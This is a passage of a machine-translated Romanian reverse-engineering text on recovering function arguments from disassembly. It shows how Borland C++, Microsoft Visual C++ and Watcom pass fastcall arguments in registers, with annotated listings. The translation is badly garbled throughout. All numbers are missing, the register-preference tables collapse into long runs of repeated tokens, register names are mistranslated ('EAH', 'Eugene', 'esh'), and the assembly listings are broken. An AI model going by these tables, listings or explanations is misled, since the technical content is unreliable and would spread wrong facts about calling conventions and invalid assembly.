lucru nu este posibil, atunci prin stivă Dacăfiecare argument nu durează mai mult de biți (ca de obicei și apare), atunci primul argument din stânga este plasatîn ax (Al), al doilea în DX (DL), al treilea în VX (BL) Dacă primul argument din stânga are tipul de Long Int, atuncielimină două registre din stivă simultan - DX: AH, atunci al doilea argument rămâne registrul VX (BL), și al treilea -și nimic deloc ( și apoi este transmis prin stivă) Când Long Int este transmis de al doilea argument, el merge la stivă,deoarece registrul de curent alternativ de care are nevoie este deja ocupat cu primul argument, al treilea argument estetransmis prin DX În cele din urmă, fiind al treilea argument din stânga, Long Ints merge la stivă, iar primele douăargumente sunt transmise prin Ax (Al) și, respectiv, DX (DL) Capitolul Identificarea argumentelor funcțiilor Transferul de indicatoare îndepărtate și valorile materiale este întotdeauna realizat prin stiva principală (și nu prinpaharul însoțirii, deoarece uneori aud bun simț) Procedura pentru preferințe Borland C ++ x la transferul argumentelorprin acord FastCall este descris pe scurt în tabel Tabelul Procedura pentru preferințele Borland C ++ x latransferul argumentelor prin acord de acord tip de preferință pentru primul cel de -al doilea al -lea char al dl inthdx bx long INTA: AX CLOINTER DX BX FIGUR X este foarte asemănător cu predecesorul său- Compilatorul Borland C ++ X,cu excepția faptului că în loc de înregistrare VX, el preferă registrul circuitelor, iar argumentele precum Int și LongInt sunt plasate în oricare dintre cele - adecvate Registrele de descărcare de gestiune și nu neapărat dx: ax Totuși,acest lucru ar trebui să fie așteptat la traducerea unui compilator de la i - la un regim pe de biți Ordineapreferințelor Borland C ++ x la transferul argumentelor prin acord FastCall este descris pe scurt întabel Tabelul Procedura pentru preferințe Borland C ++ x la transferul argumentelor prin acord Tipul depreferință FastCall pentru primul al -lea Char Al DL Cl Ints Edx Ecx Long Edx ECX EDX EDX EDX EDX EDX EDX EDX FLOOTSTACK DOCK DUBLE STACK Microsoft C ++ Microsoft C ++ se comportă în mod similar cu compilatorii Borland C ++ x, cuexcepția faptului că schimbă ordinea preferințelor candidaților pentru transmiterea semnelor, prezentarea în primul rândîn BX Și acest lucru este corect, deoarece microprocesoarele timpurii x nu au menținut adresarea indirectă nici prinAH, prin DX, iar funcțiile transferate încă trebuiau transmise fie la VX, fie la Si, fie la DI Procedura pentrupreferințele compilatorului Microsoft C ++ x la transferul argumentelor prin acordul FastCall este descris întabel PARTEA III Identificarea structurilor cheie ale limbilor de nivel înalt Tabelul Procedura pentrupreferințele Microsoft C ++ X la transferul argumentelor prin acord Tipul de preferință FastCall pentru primul al -lea char al dl int ++ x - x, dacă este posibil, transmite primul argument din stânga în registrul ECH, al doilea înregistrul EDX și tot restul prin stivă Valorile substanțiale și semnele lungi sunt întotdeauna transmise prinstivă Argumentul de tip ind (tip non-standard, întreg pe de biți, introdus de Microsoft) este întotdeauna transmisprin stivă Dacă PS este primul argument din stânga, atunci al doilea argument este transmis prin ECH, iar altreilea prin EDX În consecință, dacă INT este un al doilea argument, atunci primul este transmis prin esh, iar altreilea - prin edx Procedura pentru preferințele Microsoft Visual C ++ x - x la transmiterea argumentelor prin acordFastCall este descrisă în tabel Tabelul Procedura pentru preferințele Microsoft Visual C ++ X- X latransferul argumentelor prin acord FastCall Tipul de preferință pentru primul al -lea Char CL DL Int Edx Int StackLong Int Esh Edx-FAR EDX-FAR EDX- Far Edx-Far Edx Stack Float Stack Double Stack Watcom cu un compilator WATCOM este foarte diferit de compilatorii de la Borland șiMicrosoft În special, el nu acceptă cuvântul cheie FastCall (care, apropo, duce la probleme grave de compatibilitate),dar, în mod implicit, el încearcă întotdeauna să transfere argumente prin registre În loc de „grămada de preferințe”, îngeneral, acceptată, Watcom își atribuie rigid înregistrarea în spatele fiecărui argument: primul este EAH, al doileaedx, după al treilea Eugene, în spatele celui de-al patrulea, și dacă un argument nu poate fi plasat în specificatulspecificat Înregistrați -vă, el este plasat în stivă, la fel ca toate celelalte argumente care sunt corecte, în special,tipurile de plutitor și dublu sunt plasate în stiva principală în mod implicit, care strică întreaga imagine!Schema detransmisie a argumentelor, implicit, utilizată de compilatorul WATCOM, este descrisă pe scurt în tabel GPAVA Identificarea funcțiilor funcțiilor Tabelul WATCOM Schema de transmitere a compensării de către DefenSeler înmod implicit Argument st nd rd th Char Al Dl Bl Cl Cl Ints Edx Ebx Ecx Long Int Edx Ebx Ebx Ebx Ebx Edx EBX EBX EBXEBX Stack Stack Stack Stack Stack Stack Stack Stack Floot Stack CPU Stack CPU Stack CPU Stack CPU stack fpu stack fpustack fpu Double stack CPU Stack STACK FPU Stack FPU FPU FPU FPU FPU FPU FPU FPU FPU FPU FPU FPU FPU FPU FPU FPU FPU FPUFPU FPU FPU FPU FPU FPU FPU FPU FPU FPU FPU FPU FPU FPU FPU FPUs având următorul format: #Pragma AHI Numele funcțieiParm [Găsiți registrele] Lista registrelor admise pentru fiecare tip de argumente este prezentată în tabel Tabelul Registre admisibile pentru transmiterea diferitelor tipuri de argumente către WATCOM cu tipul acceptabil Char EbxEbx Ebx Edx EDX ESI ESI INTS EBX EBX ECX EDX EDI LONG EBX EBX EBX EDX ESI ECX ECX EDX EDX EDX EDX EDX EDX EDX EDX EDXEDX EDX EDX EDX EDX EDX EDX EDX EDX EDX EDX CX EBX CX: EAX CX: ESI DX: EBX DI: EAX SC: EDI DX: ESI DI: EBX SI: EAX CX:EDX DX: EDI DI: ESI SI: EBX BX: EAX FS: ECX FS : Edx FS: Edi FS: ESI FS: EBX FS: EAX GS: ECX GS: EDX GS: EDI GS: ESI GS:EBX GS: EAX DS: ECX DS: EDX DS: EDI DS: ESI DS: EBX DS: EAX ES: ECX ES: EDX: EDX: EDX ES: EDI ES: ESI ES: EBX ES: EAXFloat ???????????????Double EDX: EAX ECX: EBX ECX: EAX ECX: ESI EDX: EBX EDI: EAX ECX: EDI EDX: ESI EDI: EBXESI: EAX ECX: EDX EDX: EDI EDI: ESI ESI: EBX EBX: EAX mai multe explicații - În primul rând, argumentele de tip Char nusunt transmise în -, ci în registrele de de biți și, în al doilea rând, în mod neașteptat, un număr mare de perechiposibile sunt izbitoare pentru transferul unui indicator îndepărtat, iar segmentul poate fi transmis Nu numai înregistrele segmentate, ci și în registrele din categoria I cu scopuri generale Argumentele străine pot fi transmiseprin paharul coprocesorului -pentru aceasta este suficient pentru a specifica în loc de numele registrului șiasigurați -vă că compilați programul cu cheia - (sau -fpi, -fpu ), arătând The Key Compilator că instrucțiunile deînsoțire sunt permise Documentația WATCOM raportează că argumentele de tip dublu pot fi transmise și prin perechi deregistre de scop general pe de biți Partea III Identificarea structurilor cheie ale limbajelor denivel ridicat în acest fel, atunci când studiați programele compilate de compilatorul WATCOM, trebuie să fie pregătităpentru faptul că argumentele pot fi transmise în aproape orice registre pe care programatorul le va dori să leutilizeze "Identificarea transferului și recepției registrelor, deoarece funcțiile cauzate și sfidătoare sunt obligatesă respecte acordurile generale atunci când transferă argumente prin registre, compilatorul trebuie să fie plasat înacele registre în care sunt așteptate Drept urmare, înainte de fiecare funcție, următorul acord FastCall, apare un codcare „mormăie” conținutul registrelor într -un mod strict definit Ce - depinde deja de compilatorul specific Cele maipopulare scheme de transmisie argumente au fost deja luate în considerare mai devreme, nu vom reveni la această problemăaici Dacă compilatorul „dvs ” este absent în listă (ceea ce este probabil, compilatorii cresc acum ca ciupercile dupăploaie), încercați să -l instalați „caracter” experimental sau să analizați documentația De fapt, dezvoltatorii, cuexcepții rare, nu dezvăluie astfel de subtilități (și nici măcar din cauza dorinței de a ascunde acest lucru În secret, doar dacă documentați fiecare octet al unui compilator, un set complet de documentație va deveniinsuportabil) Cu toate acestea, poate că ești norocos Dacă nu, nu contează!Această problemă va fi discutată în detaliuîn secțiunea „Tehnica studierii naturii transmiterii argumentelor de către un compilator necunoscut” în acest capitol Oanaliză a codului caudal nu poate fi întotdeauna recunoscută prin transferul de argumente prin registre (bine, cuexcepția faptului că inițializarea lor va fi prea vizuală), deci trebuie să apelați direct la funcția cauzată Registrelesalvate în stivă imediat după ce au primit o funcție a unei funcții, în marea majoritate a cazurilor nu sunt registrecare transmit argumente și pot fi șterse din lista „candidaților” Printre restul, ne uităm - dacă există astfel, alcărui conținut este utilizat fără o inițializare evidentă Într -o primă aproximare prin aceste registre, funcția acceptăargumente Cu o examinare detaliată a problemei, apar mai multe rezervări În primul rând, argumentele implicite alefuncției pot fi transmise (și foarte des transmise) prin registre-indicatorii acestuia, indicatori la tabelele virtualeale obiectului, etc În al doilea rând, dacă programatorul, sperând că variabila după anunț ar trebui Fii egal zero,uită de inițializare, iar compilatorul l -a plasat în registru, apoi la analizarea programului, acesta poate fi acceptatpentru argumentul funcției transmise prin registru Cel mai interesant lucru este că acest registru poate inițializa clarfuncția sfidătoare prin coincidență accidentală LET, de exemplu, programatorul înainte de aceasta a provocat o anumităfuncție, a cărei valoare returnată (plasată de compilatorul în EAC) nu a folosit, iar compilatorul a plasat o variabilăinconsistentă în EAX Mai mult, dacă funcția la finalizarea normală revine zero (așa cum se întâmplă adesea), atunciprogramul poate funcționa pentru a identifica o astfel de eroare, cercetătorul va trebui să analizeze algoritmul -dacă funcția de finalizare a funcției este într -adevăr plasat în EAX sau există o variabilă de „impunere”?Cu toateacestea, dacă aruncăm cazurile „clinice”, transferul de argumente prin registre nu complică foarte mult analiza, pe careo vom vedea acum Un studiu practic al mecanismului de transmitere a argumentelor prin registre pentru a consolida totceea ce tocmai s -a spus, să ne uităm la exemplul dat în lista Acordați atenție directivelor de compilarecondiționată, introdusă pentru compatibilitate cu diverse compilatoare Lista Un exemplu care ilustrează transferulde argumente prin #include #include #if definit ( borlandc ) ||Definit ( MSC ver) GPAVA Identificarea funcțiilor // Această sucursală este compilată doar deBorland C ++ și Microsoft C ++ Compilers // Supportând FastCall -ul Keyword fastcall #deif // MyFunc Funcție cudiferite tipuri de argumente pentru a demonstra mecanismul // transmisia lor Myfunk (char a, int, mult timp în c, int d){#if definit ( watcomc ) // și această sucursală este special concepută pentru Watcom S // Pragma Ahi stabilește cuforță procedura de transmitere a argumentelor prin // următoarele Registre: EAS ESI EDI EUSH #Pragma aux myfunc parm[eah] [esi] [edi] [ebx];#Deif return a+b+c+d;Main () printf ("%x \ n", myfunk ( x , x , x x ));Întoarce ;Rezultatulcompilării acestui exemplu de către compilatorul Microsoft Visual C ++ ar trebui să arate așa cum se arată în lista „Listarea b/dizv yy | {od prin exemplu (listarea ), care ilustrează transmisiaSnguyotov prin Peworpw; compilată folosind Microsoft Visual C ++ Main Proc Ner C DE XREF: START+AFIP PUSE EBP MOVEBP, ESP PUSH PUSH ;Argumentele care nu aveau suficiente registre sunt transmise prin Stack ,;mergând acolo de ladreapta la stânga și le curăță de acolo funcția cauzată;(adică, totul se întâmplă ca conform STDCall-Dettlement) Movedx, ;Al doilea argument este transmis prin EDX ;Este ușor să -i determinați tipul - acesta este int Acestea În modclar, acest lucru nu este Char;Dar nu un pointer (valoare cu componente pentru indicator) MOV C , ;Prin SI, primuldin stânga este argumentul tipului de tip; (numai în variabile de tipul de dimensiuni de biți) Sună Myfunk;Putețirestabili deja prototipul funcției MyFunk (Char, Int, Int, Int) ;Da, am greșit și tipul de lungime a luat pentru intele,dar de când intră;Compilele Microsoft Visual C ++ sunt identice, o astfel de greșeală;Poți neglija ParteaIII Identificarea structurilor cheie ale limbilor de nivel înalt împinge EAX;Transmitem rezultatul funcției printf PushOffset ASC ;"%x \ n" CALL PRINTF ADD ESP, XOR EAX, EAX POP EBP Retn Main Endp MyFunk Proc Near Cod xref:main+eîp var = dword ptr - var = byte ptr - arg = dword ptr arg = dword ptr och;Doar două au fost transmiseprin flux argument și au avut succes;IDA Pro recunoscut PUSH EBP MOV EBP, ESP Sub Esp, ;Rezervăm octeți pentru variabilelocale mov [ebp+var ], edx;Registrul EDX nu a fost inițial inițial înainte de încărcarea B;Variabilă locală ѵAG Deci,este utilizat pentru transmisie;argumente!Deoarece acest program a fost compilat de compilator;Microsoft Visual C, șiel, după cum știți, raportează argumente în registre;ECX: EDX, putem concluziona că avem de -a face cu al doilea,numărarea;În stânga, argumentul funcției și undeva mai departe în textul pe care ar trebui;Respectați apelul la UE -primul din stânga argumentului funcției ;(Deși nu este necesar - primul argument cu o funcție; nu poate fi utilizat) mov[ebp+var ], cl;Într -adevăr, apelul către CL nu s -a obligat să aștepte mult ;Deoarece tipul de tip este transmis prinCL, acesta este probabil primul argument;Funcții - Char O anumită incertitudine este cauzată de faptul că funcțiapoate;Doar întoarceți -vă la octetul mai tânăr al unui argument de tip in -tip ;Cu toate acestea, după ce am analizatcodul funcției sfidătoare, ne putem asigura că;Funcțiile sunt transmise precis Char, nu int Pe parcurs, observămdezavantajul;Compilator - dacă a meritat să transfere argumente prin;registre pentru a le trimite imediat la variabilelelocale ;La urma urmei, un apel la memorie elimină toate avantajele unui apel rapid!;O astfel de provocare „rapidă” esterapidă, chiar și limba nu se transformă la nume MOVSX EAX, [EBP+VAR ];În EAX, primul argument transmis prin tip CL,tip, este încărcat în stânga;Char cu o extensie semnificativă la un cuvânt dublu Deci asta este;Char semnat (adică Charimplicit pentru Microsoft Visual C ++) Adăugați Eax, [EBP+VAR ] GPAV Identificarea argumentelor funcțiilor ;Îndoiți EAX cu al doilea argument din stânga Adăugați eax, [ebp+arg ];Îndoițirezultatul adăugării anterioare cu cel de -al treilea argument din stânga;transmis prin stiva Adăugare EAX,[EBP+arg ];Și am pus toate acestea cu al patrulea argument;De asemenea, transferat prin stivă Mov ESP, EBP POPEBP;Închideți rama lui Stack Retn ;Curățăm stiva, așa cum ar trebui să fie conform FastCall MyFunk Endp și acumcomparăm acest lucru cu rezultatul compilării Borland C ++ (listarea ) Domnule Listare Exemplul DizAssembledde exemplu (listarea ), care ilustrează transferul de argumente prin registre compilate folosind Borland C++;IntsDecl Main (int argc, Consta char ** argv, const char *envp) jnain proc în apropiere;Date xref: date: j-oargc = dword ptr argv = dword ptr och envp = dword ptr loh push ebp ebp ebp, esp push ;Transferăm argumentul prinstivă Semănându -ne ochii în jos, găsim evident;Inițializarea UE, EDX, Al Pentru al patrulea argument;Nu existausuficiente registre și trebuia transmisă prin stivă Mijloace, ;Al patrulea din stânga argumentului funcției este x Movech, mov edx, mov al, ;Acest cod nu poate fi altceva decât transferul de argumente prin;Registre Sunați myfunk pusheAH push offset unk ;Format Call Printf Add ESP, XOR EAX, EAX POP EBP PARTEA III Identificarea limbilor denivel înalt Retn Main Endp myfunk proc C de xref: main+llîp arg = dword ptr ;Prin flux, a fost transmis un singurargument Push EBP MOV EBP, ESP;Deschide rama Stack Movsx eax, Al;Borland a generat un cod mai optim decât Microsoft,fără a fi plasat;Registrul într -o variabilă locală și astfel economisind memorie In orice caz,;Dacă a fost setată cheiade optimizare corespunzătoare;Microsoft Visual C ++ ar fi făcut exact același lucru ;Acordați atenție faptului căBorland procesează argumente;în expresiile de la stânga la dreapta, în ordinea transferului lor în prototip;Funcții, întimp ce Microsoft Visual C ++ acționează invers Adăugați EDX, EAH Adăugare ECX, EDX;Registrele EDX și CX nu au fostinițializate, ceea ce înseamnă că există funcții în ele;Argumentele sunt transferate Mov edx, [ebp+arg ];Încărcămultimul argument al funcției transmise prin stiva Adăugare ECX, EDX;Pliați din nou Mov eax, esh;Transferul la EAX (înEAH, funcția returnează rezultatul finalizării acesteia) Pop ebp retn ;Curățăm stiva MyFunk Endp În sfârșit, rezultatulcompilării aceluiași exemplu folosind Watcom C ar trebui să arate așa cum se arată în lista Lista Exempludezasamblat de exemplu (listarea }, transmisie ilustrată ' Argumente prin registre compilate folosind watcom cumain proc aproape Stack Gpava Identificarea funcțiilor Mov Ebx, MOV EDI, MOV ESI, MOV EAX, ; vezi,Argumente transmis prin acele registre pe care le -am indicat ;Mai mult, rețineți că primul argument al tipului CAR estetransmis;Registrul pe de biți EAX Acest comportament al WATCOM este extrem de;face dificilă restabilireaprototipurilor funcțiilor în acest caz;Alocarea de către registrele valorilor are loc în conformitate cu ordineaanunțului;Argumente în prototipul funcției, luând în considerare dreptul ;Dar așa, din păcate, se întâmplă departe deîntotdeauna Apelați myfunk push eAx push offset unk Call printf adaugă esp, xor eax, eax pop edi pop ebx retnmain endp myfunch proc aproape C DE XREF Main + viteză;Funcția nu acceptă un singur argument prin stivă Împingeți Apelați SNK și EAH, Offh;Khublings din cei douăzeci de ani mai vechi, cuplat cu registrul;Înainte de inițializareasa, sugerează că un tip este transmis prin EAX; Ce argument nu putem spune, din păcate Adăugați ESI, eah;RegistrulESI nu a fost inițializat de funcția noastră, prin urmare ,;Un argument de intenție este transmis prin acesta Se poatepresupune că;Acesta este al doilea argument din prototipul funcției, deoarece (dacă nimic; nu împiedică), registrele dinfuncția sfidătoare sunt inițializate;Conform procedurii lor de listare în prototip, contorizând pe dreapta, A;Expresiilesunt calculate de la stânga la dreapta ;Desigur, adevărata ordine a argumentelor este necritică, dar;Încă frumos, dacăreușești să -l restaurezi Lea Eah, [ESI+Edi];Crezi că indicatorul se încarcă în EAX?;ESI și EDI Funcțiile transmise suntși semne?Eah cu el;Tipul Char devine foarte asemănător cu indexul ;Vai!Compilatorul WATCOM este prea viclean atuncicând analizează programe;Compilat cu acesta, este foarte ușor să intri în erori brute ;Da, EAX este un indicator, însensul că Lea este folosit;Calculele sumei de ESI și EDI, dar accesul la acest indicator Partea aIII -a Identificarea structurilor cheie ale limbilor de nivel ridicat;nu apare nici în funcția sfidătoare, nici înfuncția cauzată Prin urmare, ;Argumentele funcției nu sunt indicatoare, dar constantele adaugă eax, ebx;În mod similar,EDX conține un argument transmis ;Deci, prototipul funcției ar trebui să arate astfel:,- myfunk (char a, int, int, intd);Cu toate acestea, procedura de urmărire a argumentelor poate fi alte Retn MyFunk Endp După cum puteți vedea, nuexistă nimic deosebit de complicat în transmiterea argumentelor prin registre, puteți chiar restabili prototipulautentic al funcției cauzate Cu toate acestea, situația, doar luată în considerare, este destul de idealizată, iar înprogramele reale, transferul numai a valorilor directe este rar Să ne stăpânim acum, după ce am stăpânit provocărilerapide, Dizassembging un exemplu mai dificil dat în lista Lista Un exemplu dificil cu FastCall #if definit( Borlandc ) ||Definit ( msc ver) fastcall #endif myfunk (char a, int *b, ints) {#if definit ( watcomc )#pragma aux myfunc parm [eax] [ebx] [ecx];#Deif return a+b [ ]+c;Main () (int a = ; printf ("%x \ n", myfunk (strlen(" "), & a, strlen (" "))};} rezultatul compilării exemplului dat în Listarea , cu ajutorul Microsoft Visual C ++ar trebui să arate așa cum se arată în Lista Listarea Rezultatul compilării unui exemplu complex cuFastCall {Listarea ) folosind Microsoft Visual C ++ Main Proc Near: Start++ AF^P VAR Compiler = DWORD PTR - PUSHH EBP MOV EBP, ESP; Deschideți cadrul fripturii Push ECX Push ESI; salvați registrele în stivă ; alocați variabilalocală ѵAG Valoarea ; tipul este determinat pe baza faptului că variabila ocupă octeți Azz -uri de offset push;Consta char *; trimiteți funcțiile Strlen la linia " " Pushh eax ; aici - sau păstrăm valoarea returnată de funcțieîn stivă ,; sau transmisăÎmi mănânc următoarea funcție Lea ESI, [EBP+VAR ];În ESI, introducem indicatorul la variabilalocală ѵAG Push Offset al;const chaar *;Transmitem funcțiile indicatorului Strlen la linia „ ” Sunați strlen add esp, mov cl, al;Valoarea returnată este copiată în registrul CL și este inițializată mai jos;Edx Deoarece ECX: EDX suntutilizate pentru a transmite argumente;Funcții FastCall, inițializarea acestor două registre înainte de apel;Funcțiilenu sunt în mod clar accidentale!Se poate presupune că este transmis prin CL;Char de tip argument extrem stânga Mov Edx,ESI;ESI conține un indicator pentru ѵAG , prin urmare, al doilea argument;Funcțiile, cum ar fi Int, introduse în EDX,sunt transmise de link Sună Myfunk;Prototipul preliminar al funcției arată astfel :;Myfunk (char *a, int *b, inc c);Deunde a venit argumentul C?Și amintiți -vă, EAX și; Nici înainte de a apela funcția, nici după ce a fost împinsă?Cu toate acestea, la;Asigurați -vă că acest lucru estenecesar în sfârșit, trebuie să vedeți câți octeți C;Stack elimină funcția cauzată ;De asemenea, acordați atențiefaptului că valorile returnate de funcție;Strlen, nu au fost introduse în variabile locale, ci transmise;Directmyfunk Acest lucru sugerează că codul sursă;Programele arătau astfel :;Myfunk (strlen (" "), & var , strlen(" "));;Deși, însă, nu este un fapt, compilatorul ar putea optimiza codul, aruncându -l;Variabilă locală dacă nu maieste utilizată nicăieri In orice caz ;În primul rând, judecând după codul cauzat, compilatorul funcționeazăfără;optimizare și, în al doilea rând, dacă valorile returnate de funcții;Strlen, folosit o dată ca argument;Myfunk,apoi plasarea lor într -o variabilă locală este o prostie deosebită ,;Estompând doar esența programului Mai mult,cercetătorul poate fi găsit informații mai detaliate în capitolul , „Identificarea variabilelor locale de sticlă” PARTEA III Identificarea structurilor cheie ale limbilor de nivel ridicat;Este important să nu restaurați codul sursăautentic, ci să înțelegeți algoritmul său Push EAH Push Offset ASC ;"%x \ n" apel printf add esp, pop esi movesp, ebp pop ebp;Închideți rama lui Stack Retn principal endp myfunk proc în apropiere;Cod xref: main+ eope var =dword ptr - var = byte ptr - arg = dword ptr ;Funcția acceptă un argument - ceea ce înseamnă că este;Acea EAH afost listată în Stack Push EBP MOV EBP, ESP;Deschide rama Stack Sub esp, ;Rezervăm opt octeți pentru variabilelocale mov [ebp+var ], edx;Deoarece EDX este utilizat fără o inițializare evidentă, evident;Prin aceasta, al doileaargument al funcției este transmis prin acesta;(Conform acordului FastCall, compilatorul Microsoft Visual C ++) ;Dinanaliza codului funcției sfidătoare, știm deja;că în EDX există un indicator pentru ѵAG , prin urmare ,;ѵag conțineacum un indicator pentru ѵag mov [ebp+var ], cl;Prin intermediul CL, cel mai stânga argument al tipului decaracteristici este transmis și chiar acolo;Este introdus într -o variabilă locală ѵAG MOVSX EAX,[EBP+VAR ];Variabila ѵAG se extinde la Int semnat Mov ech, [ebp+var ];Conținutul indicatorului ѵAG ,transferat;prin edx Într -adevăr, după cum ne amintim, prin funcțiile EDX;Indicatorul a fost transmis Adăugați eax,[esh];Adăugăm EAX (stochează primul argument al funcției din stânga) cu conținutul;Celulele de memorie indicate deotrăvirea ECH;(Al doilea din stânga este argumentul) Adăugați eax, [EBP+arg ] GPAVA Identificarea argumentelorfuncțiilor ;Și iată apelul la argumentul funcției care a fost transferat prinstivă, Mov ESP, EBP POP EBP;Închideți rama lui Stack Retn ;Funcțiile au fost transferate argument prin stivă MyfunkEndp este simplu?Doar!Apoi, avem în vedere rezultatul activității Borland C ++, care ar trebui să arate așa cum se aratăîn lista : Listarea Rezultatul compilării unui exemplu complex cu FastCall (listarea ) folosind uncompilator Borland C ++ ;Intsdecl Main (int argc, Consta Char ** argv, Consta Char *Envp) -Main Proc în apropiere Datexref: date: to ​​var = dword ptr - argc = dword ptr argv = dword ptr och envp - dword ptr loh push ebp ebp,esp;Deschide rama Stack Împinge ECX;Salvați ECX așteptați!Este ceva nou!În exemple trecute;Borland nu a păstratniciodată Ech la intrarea în funcție Este foarte asemănător că;Prin ESH, un anumit argument a fost transferatfuncțiilor, iar acum transmite;Cealaltă funcție a acesteia prin stivă ;Din păcate, oricât de convingătoare ar arăta oastfel de decizie, este incorectă ”;Compilatorul este rezervat pur și simplu pentru variabile locale de patru octeți ;Dece?De unde vine?Vezi: Ida a recunoscut unul local;variabila ѵag , dar memoria pentru ea nu era în mod clar rezervată,în niciunul;Cazul comenzii sub esp, nu a fost Așteptați un timp, așteptați, dar împingeți -l pe Esh;Doar duce la oscădere a registrului ESP cu patru ';Oh, această optimizare „mov [ebp+var ], ;Intrăm într -o valoare variabilă locală Push Offset Azzz;S;Transmitem funcțiile indicatorului Strlen la linia „ ” Sunați strlen pop esh;Turnați argumentuldin stivă PUSH EAH;Aici - sau transmitem valoarea prezentată de funcție;următoarea funcție ca argument de sticlă saupăstrează temporar EAX;În stivă (mai târziu se dovedește că ultima presupunere este corectă) PARTEAIII Identificarea structurilor cheie ale limbilor de nivel înalt împinge compensarea AL;S;Transmitem funcțiileindicatorului Strlen la linia „ ” Sunați strlen pop esh;Turnați argumentul din stivă Lea edx, [ebp+var ];Încărcăm îndeplasarea EDX a variabilei locale ѵAG Ror Esh;Împingem ceva din stivă, dar ce anume?Derularea ecranului; Dizassembler up, descoperim că ultimul EAX a fost introdus în stivă;care conține o valoare returnată de funcția Strlen(" ") ;Acum este plasat în registrul ESC;(După cum ne amintim, Borland trece prin ea al doilea argument dinstânga) ;Pe parcurs, observăm pentru iubitorii de fastcall: acesta nu este întotdeauna un acord;duce la accelerațiapreconizată a apelului - Intel x are prea puțin;se înregistrează, și acum și apoi trebuie să fie păstrați înstivă ;Transferul argumentului prin stivă ar necesita un singur apel :;Împingeți eah Aici observăm două - Push EAX șiROR ECH Call Myfunk;Atunci când restabiliți prototipul funcției, nu uitați de registrul EAX - IT;Nu este inițializatclar, dar păstrează valoarea care se datorează acestuia din urmă;Sunați Strlen Deoarece compilatorul Borland C ++ Xutilizează;Următoarea listă de preferințe: EAX, EDX, ESH, putem concluziona că;Primul argument al funcției este transmisîn EAX, iar celelalte două în EDX;Și, respectiv, esh Acordați atenție faptului că Borland C ++ ,;Spre deosebire deMicrosoft Visual C ++, procesează argumente nu în ordine;enumerațiile lor și mai întâi calculează valorile tuturorfuncțiilor ,;„Scoțându -le” de la dreapta la stânga și abia atunci trece la alternativă și;constante Și acest lucru arepropriul său bun simț - funcții;Modificați valoarea multor registre generale și, până atunci;Până la ultima funcție, nuputeți trece la transmisie;argumente prin registre Push EAH Push Offset ASC ,- Format Call Printf Add ESP, XOREAX, EAX;Returnează valoarea zero Pop ecx pop ebp;Închideți rama lui Stack Retn jnain endp myfunk proc C DE XREF: Main+ Speed ​​Push EBP EBP EBP, ESP Capitolul Identificarea funcțiilor argumente;Deschide rama Stack Movsxeax, Al;Extindem EAX la un semn al unui cuvânt dublu Mov edx, (edx]; încărcăm conținutul celulei de memorie în EDX; careindică EDX Adăugați eax, edx; adăugăm primul argument al funcției cu o variabilă int, transmisă; al doilea argumentprin link Adăugați esh, eAh; plierea celui de -al treilea argument; tastați int cu rezultatul adăugării anterioare,mov eax, EU; plasăm rezultatul înapoi în EAH Un exemplu de compilator Watcom C, care are întotdeauna ceva de învățat (Listare ) Main Proc apropiat; Cod xref: SMAIP+ IR var c = DWORD PTR -OCH; Variabilă locală Push h Call chk; verificarea stivei pentru revărsare Push Push EBX ECXH ECXH ECX; Prezervarea registrelor modificate Sau - - Poate rezervarea memoriei pentru variabilele locale? Sub esp, ; aceasta este cu siguranță o rezervare clară amemoriei pentru un local;Prin urmare, Yu, două echipe de apăsare care sunt deasupra;Păstrează într -adevărregistrele Mov [esp+och+var c], ;Intrarea într -o valoare variabilă locală de MOV EAX, compensă Azzz;„ ” Partea a III -a Identificarea structurilor cheie ale limbilor de nivel înalt apelează Strlen ;Acordațiatenție - Watcom transmite funcțiile indicatorului Strlen către;Liniați prin registru!Mov Eu, eah;Valoarea valoriivalide este copiată în registrul ESC ;Watcom știe că următorul apel Strlen nu strică acest registru!Mov eax, offsetal;" " Call Strlen și EAX, offh;Deoarece Strlen returnează tipul int, există unul clar aici;Tipuri Transformare: int ->char Mov ebx, esp;În EBX, un indicator este introdus la variabila ѵAG S Sună Myfunk;Ce argumente au fost transmisefuncțiilor?În primul rând, eax - probabil;Argumentul extrem de stânga și, în al doilea rând, Eugh este inițialinițial;Înainte de a contesta funcția și, probabil, esh, deși acesta din urmă nu este;neapărat ECH poate conține, deasemenea, o variabilă de registru, dar în aceasta;În cazul unei funcții, funcția nu ar trebui să o contacteze Push EAHPush Offset ASC A;"%x \ n" CALL PNTF ADD ESP, ADD ESP, ;De asemenea, ei spun că WATCOM este un compilator deoptimizare!Dar două;Din păcate, nu a putut uni echipele într -una!Ror ech pop ebx retn main endp myfunk procaproape C DE XREF: Main + Speed ​​Push Apel chk;Verificând stiva și eax, offh;Zero repetat de de bițiseniori Watcom ar trebui;Decide: unde să efectuezi această operație este cauzată sau;Cauzând funcție, dar o astfel deduplicare simplifică;Restabilirea prototipurilor funcțiilor Adăugați eah, [ebx];Adăugăm valoarea Char de tip EAX și acumextins la IN cu variabila Capitolul Identificarea argumentelor funcțiilor ;Tip Int, transmis prin referință prin registrul EVS Adăugați eax, esh;Da, aici este un apel la Ech, prin urmare, acest registru;folosit pentru a transfera argumente Retn;Astfel, prototipul funcției ar trebui să arate astfel :;Myfunk(char eax, int *eush, int eu) ;Vă rugăm să rețineți că a fost posibil să -l restabiliți doar prin articulație;Analizafuncțiilor cauzate și sfidătoare!Transmiterea endpului Myfunk a valorilor materiale, conducătorul masei proprii nuînțeleg cu adevărat aritmetica materială, evitând -o ca foc Între timp, nu există nimic super-complex în el și putețistăpâni controlul însoțirii în doar o zi și jumătate până la două zile Este adevărat, este mult mai dificil să faci fațăbibliotecilor matematice care susțin calculele cu un punct flotant, mai ales dacă IDA Pro nu recunoaște numelefuncțiilor lor, dar care compilator folosește astăzi bibliotecile astăzi?Microprocesorul și însoțirea sunt montate pe uncristal, iar însoțirea, începând cu dx, este întotdeauna disponibilă, astfel încât nu este necesară recurgerea laemularea sa software Până la sfârșitul anilor nouăzeci a secolului trecut, a existat o opinie în rândul hackerilor că sepot trăi toată viața, dar nu pentru a întâlni aritmetica materială Într -adevăr, în vremurile bune, procesoarele dinîncetinirea lor nu erau în niciun fel inferioare de broaște țestoase, nu toată lumea avea însoțire, dar sarcinile cucare se confruntă calculatoarele au permis (nu fără trucuri, totuși) soluții și aritmetică întreagă Astăzi totul s -aschimbat dramatic Calcule cu un punct plutitor efectuat de convesor în paralel cu activitatea programului principal,chiar mai rapid decât calculele întregi calculate de procesorul principal Și programatorii, inspirați de o astfel deperspectivă, au început să folosească tipuri de date de date chiar și acolo unde existau mai mult decât suficientîntreg De exemplu, dacă a = b/s* , atunci schimbând procedura de calcul pentru a = b*ioo/s, putem face tipurile 